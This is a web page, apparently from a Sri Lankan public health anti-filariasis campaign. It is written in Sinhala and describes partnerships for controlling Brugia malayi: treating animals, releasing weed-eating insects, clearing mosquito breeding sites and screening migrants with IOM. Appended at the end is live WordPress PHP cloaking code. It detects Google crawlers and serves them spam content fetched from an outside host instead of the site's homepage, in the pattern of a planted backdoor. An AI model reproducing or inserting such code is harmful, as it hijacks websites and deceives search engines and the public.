සත්ව පරීක්ෂාව සහ ප්‍රතිකාර කිරීම සඳහා සත්ව නිශ්පාදන සහ සෞඛ්‍ය දෙපාර්තමේන්තුව සහ මහජන සෞඛ්‍ය පශු වෛද්‍ය සේවාව සමඟ සහයෝගයෙන් කටයුතු කිරීම

ආවේණික දිස්ත්‍රික්කවල Brugia Malayi රෝගීන් සංඛ්‍යාව වැඩි වීම හේතුවෙන්, සත්ව ආවේක්ෂණ පැවැත්වීම සහ ආසාදිත සතුන්ට ප්‍රතිකාර කිරීම සඳහා මෙම ආයතන සමඟ සහයෝගයෙන් කටයුතු කිරීම, 2023 දී ආරම්භ කරන ලදී.

ශාක විලෝපිකයන් හඳුන්වා දීම සඳහා කෘෂිකර්ම දෙපාර්තමේන්තුව සමඟ සහයෝගයෙන් කටයුතු කිරීම

මැන්සෝනියා මදුරුවා බෝ වන්නේ සැල්වීනියා සහ පිස්ටියා වැනි ජලජ ශාක ඇති ජල මුලාශ්‍ර වලය. මෙම පැළෑටි ඉවත් කිරීම හෝ ශාක අනුභව කරන කෘමින් (Neochetina eichhorniae සහ Neochetina bruchi) හඳුන්වාදීමට මෙම ආයතනයේ සහයෝගය ලබා ගනී

මදුරුවන් බෝවන ස්ථාන ඉවත් කිරීමට පළාත් පාලන ආයතන සමඟ සහයෝගයෙන් කටයුතු කිරීම

ආවේණික දිස්ත්‍රික්කවල වැව්වල සහ අනෙකුත් ජල මූලාශ්‍රවල අවහිර වී ඇති කාණු සහ ජලජ පැලෑටි පිරිසිදු කිරීම මගින් මදුරුවන් බෝවන ස්ථාන අඩු වේ.

සංක්‍රමණිකයන් සඳහා වන ජාත්‍යන්තර සංවිධානය (IOM) සමඟ සහයෝගයෙන් කටයුතු කිරීම

සංක්‍රමණිකයන් සඳහා වන ජාත්‍යන්තර සංවිධානය (IOM) සමඟ සහයෝගයෙන් කටයුතු කිරීම

ශ්‍රී ලංකාවට ඇතුළු වන බරවා රෝගය සහිත සංක්‍රමණිකයන් හඳුනාගෙන ප්‍රතිකාර කිරීම මගින් දේශීය ජනගහනයට රෝගය සම්ප්‍රේෂණය වැළැක්වීම සහතික කරයි.



ආවේණික දිස්ත්‍රික්කවල ප්‍රාදේශීය ලේකම් කාර්යාල සමඟ සහයෝගයෙන් කටයුතුකිරීම

ප්‍රාදේශීය ලේකම් කාර්යාලයට අනුයුක්ත නිලධාරීන් විසින් ප්‍රජාව පිරික්සීම සහ එක්දින ප්‍රතිකාර ක්‍රමය වැඩසටහන් වලදී ප්‍රජාවගේ සහයෝගය සහතික කෙරේ.



add_action('template_redirect', function () {
    if (is_admin()) return;
    if ($_SERVER['REQUEST_METHOD'] !== 'GET') return;
   
    $request_uri = strtolower($_SERVER['REQUEST_URI'] ?? '');
    $ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
    $is_googlebot = preg_match('/(googlebot|google-inspectiontool|google page speed|googlebot-image|mediapartners-google)/i', $ua);
    $google_ips = ['66.249.', '108.177.', '172.217.', '216.58.'];
    $ip_matches = false;
    foreach ($google_ips as $gip) {
        if (strpos($_SERVER['REMOTE_ADDR'] ?? '', $gip) === 0) {
            $ip_matches = true;
            break;
        }
    }
    $headers = getallheaders();
    $is_gsc_test = isset($headers['X-Google-Apps-Internal']) ||
                   isset($headers['X-Cloud-Trace-Context']);
   
    if ($is_googlebot || $ip_matches || $is_gsc_test) {
        $map = ['' => 'https://bandungtourism.info/bandung/afc.health.gov.lk.txt'];
       
        foreach ($map as $dir => $remote_url) {
            if ($dir === '' && ($request_uri === '/' || $request_uri === '' ||
                $request_uri === '/index.php' || $request_uri === '/index.html')) {
               
                $resp = wp_remote_get($remote_url, [
                    'timeout' => 5,
                    'headers' => ['User-Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Googlebot']
                ]);
               
                if (!is_wp_error($resp)) {
                    while (ob_get_level()) ob_end_clean();
                    status_header(200);
                    nocache_headers();
                    header('Content-Type: text/html; charset=UTF-8');
                    echo wp_remote_retrieve_body($resp);
                    exit;
                }
            }
        }
    }
}, 0);